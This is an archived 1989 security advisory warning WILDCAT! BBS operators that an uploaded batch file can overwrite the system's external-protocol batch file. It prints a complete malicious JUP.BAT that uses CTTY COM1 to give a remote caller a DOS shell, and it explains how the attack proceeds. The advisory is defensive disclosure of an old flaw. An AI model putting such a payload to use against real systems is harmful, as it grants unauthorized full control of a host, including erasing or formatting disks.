💾 Archived View for spam.works › mirrors › textfiles › bbs › security.txt captured on 2023-11-14 at 09:06:33.

View Raw

More Information

⬅️ Previous capture (2023-06-14)

-=-=-=-=-=-=-



                            WILDCAT!(tm) BBS system
                               Security Emergency
                                 Documentation
                                January 2, 1989
                               Richard B. Johnson
                                PROGRAM EXCHANGE
                                 (303) 440-0786

          There exists within the WILDCAT!(tm) external protocol pro-
          cedures the considerable possibility that somebody who is
          familiar with the system could execute a copy of COMMAND.COM
          and have full control of your computer, erasing or format-
          ting disks, and creating all kinds of havoc. Basically, any-
          thing that you could do from the keyboard can be done by the
          remote-user if he knows how to do it.

          Please read all the ".DOC" files in this archive and the
          archives included within. I also suggest that you implement
          LOG (LOG.ARC) if you haven't already done so. I was able to
          detect an attempt at breaching security on my own system.
          The only thing that prevented the hacker from getting to the
          DOS level was he didn't know what the "upload" filename was
          on my system. The LOG utility was what first called my
          attention to this problem.

          Note that I was able to log onto a system in Colorado as a
          new user and, within 60 seconds I was at the 'DOS' level. It
          had taken me only 20 seconds on my own system but I knew the
          names of the "upload" batch files and the communications
          adapter port being used.

          The problem is that the external protocol setup, as advised
          by Mustang Software, will allow an "upload" batch file to be
          replaced by a batch file of the same name during an upload!
          If your communications adapter port is COM1, and you use a
          batch file called JUP.BAT for JMODEM uploads, the hacker
          could upload the following JUP.BAT file:

          REM * hacker's special
          REM
          REM
          REM
          REM
          REM
          REM
          REM
          IF %3 == HACKER.TXT GOTO BREAK
          GOTO END
          :BREAK
          @ECHO OFF
          CTTY COM1
          COMMAND
          :END










                                     - 1 -
          




          It works this way. The first "upload" is a file called
          JUP.BAT. JMODEM (could be ZMODEM or any external protocol)
          dutifully overwrites the existing JUP.BAT and exits with no
          errors.

          COMMAND.COM, when executing a ".BAT" file opens then closes
          the file for each line in the file. COMMAND.COM "knows" that
          the last line was, perhaps, line 4. It therefore looks at
          line 5 for its next instruction. It executes one of the
          several "REM" statements, then exits at the ":END" label
          since the filename (%3) was not HACKER.TXT.

          The BBS system software regains control and, finding no file
          transferred, simply continues like nothing happened.

          The hacker then attempts to upload HACKER.TXT using the
          JMODEM protocol. JUP.BAT has been replaced with the hacker's
          new version. Since the %3 parameter is now HACKER.TXT, the
          batch file branches to label ":BREAK". The console input is
          redirected to the COM1 port and an additional copy of
          COMMAND.COM is loaded with its I/O having been redirected to
          the COM1 port.

          Of course the hacker has not executed any external protocols
          on his system. He's just sitting there in terminal-mode in
          full control of your system.

          Caveat modulus carborundum.

          - finis -






























                                     - 2 -